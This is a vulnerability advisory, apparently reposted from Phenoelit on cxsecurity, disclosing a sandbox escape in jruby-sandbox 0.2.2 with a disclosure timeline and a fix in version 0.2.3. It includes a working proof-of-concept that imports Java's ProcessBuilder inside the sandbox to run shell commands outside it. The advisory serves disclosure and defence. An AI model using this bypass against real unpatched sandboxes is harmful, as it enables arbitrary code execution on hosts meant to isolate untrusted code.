JRuby Sandbox 0.2.2 Bypass

2014.04.25
Credit: joernchen
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++> [ Authors ] joernchen <joernchen () phenoelit de> Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] jruby-sandbox <= 0.2.2 https://github.com/omghax/jruby-sandbox [ Vendor communication ] 2014-04-22 Send vulnerability details to project maintainer 2014-04-24 Requesting confirmation that details were received 2014-04-24 Maintainer states he is working on a test case 2014-04-24 Maintainer releases fixed version 2014-04-24 Release of this advisory [ Description ] jruby-sandbox aims to allow safe execution of user given Ruby code within a JRuby [0] runtime. However via import of Java classes it is possible to circumvent those protections and execute arbitrary code outside the sandboxed environment. [ Example ] require 'sandbox' sand = Sandbox.safe sand.activate! begin sand.eval("print `id`") rescue Exception => e puts "fail via Ruby ;)" end puts "Now for some Java" sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'") sand.eval("Kernel.send :java_import, 'java.util.Scanner'") sand.eval("s = Java::java.util.Scanner.new( " + "Java::java.lang.ProcessBuilder.new('sh','-c','id')" + ".start.getInputStream ).useDelimiter(\"\x00\").next") sand.eval("print s") [ Solution ] Upgrade to version 0.2.3 [ References ] [0] http://jruby.org/ [ end of file ]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top